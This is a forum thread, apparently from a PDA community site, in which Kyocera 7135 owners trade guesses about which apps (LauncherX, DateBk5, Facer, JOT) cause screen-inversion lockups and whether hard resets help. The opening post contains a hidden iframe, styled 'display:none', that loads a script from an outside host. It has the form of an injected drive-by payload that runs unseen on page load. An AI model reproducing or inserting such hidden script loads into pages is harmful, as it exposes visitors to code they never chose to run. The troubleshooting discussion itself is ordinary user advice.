+ Reply to Thread
Page 1 of 2 1 2 LastLast

My 7135 is locking up due to some app :o(

Well, the phone is great, but a few days ago it started doing the reverse color (negative) freeze/lockup when I try to use almost any pqa or the graffiti area during LauncherX, EIS, etc. I'm sure it is some hack or app I added recently, but I can't figure it out.

I'm sure marctronixx will say, "Just do a hard reset and then add each app one by one until you are back to normal."

But I have WAY too many apps to do that and I REALLY don't want to have to suffer through that.

Has this same problem happened to anyone else? Do you know what bad app I need to remove?

And life was soooo good until the other day.

:help<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ~'kito
    pdaPhoneHome Moderator

Can you backtrack through your Hotsync Log to see what the last thing you installed was and remove em backwards to see if it fixes it?

Also just for reference... how much free RAM do you have? I have heard of some problems with normal palms that are the result of adding an app but not the apps fault but rather due to low RAM. One example happend to me a while back, I had everything running smooth on a palm III & then I added a channel to my avantgo..so nothing new installed, just more memory taken up by the Avantgo PDB. I had slow performance and a few apps actually told me that there was not enough room to run. Never have had any inverse screen probs myself.

Another idea...Does Launcher X have a "gadget" icon for turning on the backlight? Does it have settings? unlke the original palm screens, the M-Series palms all use Inverted backlights (the non-color ones) the Words light up and not the background... I wonder if LX or some app is turning on the Backlight the wrong way.... does toggleing the backlight on/off do anything?

Good luck Markito.
    iPhone therefore iAm.

I have had issues with:
    AppHack
    DateBK5
    MultiMail (predecessor to Mobile Mail, and don't ask why I was using it. Ok I'll tell you, I was stupid)
    LauncherX (I have had good luck with SilverScreen, MegaLauncher and YiShow)
    FastCPU 3
    Quickbits (Freeboost doesn't cause problems but I also can verify a speed increase)

Thanks for the feedback.

DateBK5 works great for me and always has.
    LauncherX worked great until a few days ago.
    I don't use any of the others on the list.

And Steve, thanks, but it is definitely a freeze/crash, not just an inverted light.
    ~'kito
    pdaPhoneHome Moderator

On a few occasions DateBk5 has done that when I am in week view and have tapped the little day number. It's only happened about three times and a soft reset fixed it each time. Maybe you could start a sticky poll with everyone listing the apps they installed and then stating whether they have any problems. We should then be able to come up with a field of apps that may cause problems.

Try removing DateBk and see what happens, also the same with LauncherX. I'd bet it's probably one of these two. Also, if you're running some kind of accelerator program remove that and see if you still have the issue.

I'm thinking it is LX and not Datebk5 (if you don't have Datebk5 handling alarms). As much as I like LX, I've had trouble with it also. If you delete it, make sure you remove EVERYTHING if you plan to re-install it. Use Filez or the like to find any database that doesn't get deleted. I stopped having lockups only after I did this.

If you reinstall LX and it remembers any of your settings, you didn't completely clear it off.

You mentioned trying Facer in another post. I've had more than my share of resets the past few days, ever since I downloaded Facer to try it out. Great app, but I still want to test it for another week before I register it.

I've had two lock-ups this week the latest being this morning while using EIS. Like veryone else who has reported, I am using dbk5, lx and to add to the potential culprits TakePhone 5.04i.

I only have one hack(Keyboard Hack) and am using Xmaster.

I too think it is LX but have not deleted yet. I went a bit crazy over the past couple of days loading aps and I'd hate to go backwards but that may be the price to solve the issue.

Waiting to see if anyone narrows this down.

Ham

I got rid of LauncherX and all of the problems still exist. I even did a soft reset after deleting all the LX stuff and still out of luck.
    ~'kito
    pdaPhoneHome Moderator

OK, it must not be LX.

What hacks do you have enabled? Do you use PiDirect or anything like that? When does it freeze exactly? Can you duplicate a series of key strokes and reproduce it?

I noticed a freeze (inverted screen) when I do a screen copy in a PQA. (I stopped doing that.)

Administrator
    im tellin' ya, the best way is to do a cold boot and do the manual...

i thought it was LX also, but since not it must be something else (obviously)...

the cold boot is da best way my friend....

I have had problems with the reverse/lockup when JOT is enabled. If I turn JOT off, I don't have the problems....by any chance are you using JOT?

Facer

I think it was Facer. I tried it for a day, then deleted it. Then I started having the same sort of problems that Markito is talking about.

I did the hard reset last Friday. Just put back on what I HAD to have for the weekend, and all this week have been slowly putting programs back on...including LX (which I love) and have had NO lock up/color inversion problems. In fact I feel much better about my phone now. It's kinda like my laptop. About every 6 months I reformat the hard drive, reinstall the OS and start clean.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

When y'all do regular hard resets, do you reinstall all applicaions and recreate your Saved_Preferences and Net_Prefs, each time? If so, Dang, y'all are good. I have 15 PQAs, 58 discrete apps and 11 hacks to install. At least 30 of my apps/hacks have registration codes. I can't imagine starting from scratch like that on a regular basis.

I am beginning to worry about my brief encounter with Facer. Hope there iare no bugs on my 7135.

I don't think its any app. we've downloaded because my first lock/inversion happened before ANY apps were installed. A few bookmarks had been made in EudoraWeb and some addresses noted in standard DateBk only. I can't recall the app. I was using at the time but it happened as I pressed the screen with the stylus. I occasionally get inversions/locks but so far no rhymn(sp) or reason.

I hope the VZ people caught this!
    iPhone therefore iAm.

My first lockup/inverted screen was before even hotsyncing. I had to install the newer 7135 desktop before it would work.

I hear that others didn't have to install over their existing software.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Hmmm, another lock up. Not having fun!

I cleared a reminder from the phone at 3:30p, closed the calmshell, then left for the appointment. Got in the car, drove and when I got to the appointment I looked at my LCD and it said it was 3:30pm. HUH?

Opened the clam shell to a black screen and no functions whatsoever. Did a soft reset back to NONE of my progams information etc.

Came home, did a Hot Sync...and the phone kept locking up on LauncherX. So I deleted it. Fine for now.

Could we be narrowing this down to LauncherX? I hope not...I LOVE that program (considering 2 weeks ago I did not even know what a launcher was).

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Originally posted by 7135orBust
    I don't think its any app. we've downloaded because my first lock/inversion happened before ANY apps were installed. A few bookmarks had been made in EudoraWeb and some addresses noted in standard DateBk only. I can't recall the app. I was using at the time but it happened as I pressed the screen with the stylus. I occasionally get inversions/locks but so far no rhymn(sp) or reason.
    I agree. The only app I have is DateBk5 and I've gotten the lock up about three times. I think it may be a generic problem and possibly something we may have to live with. I don't think we can expect Verizon to fix it since they will only likely be concerned with the phone side, and not the palm side, of the 7135.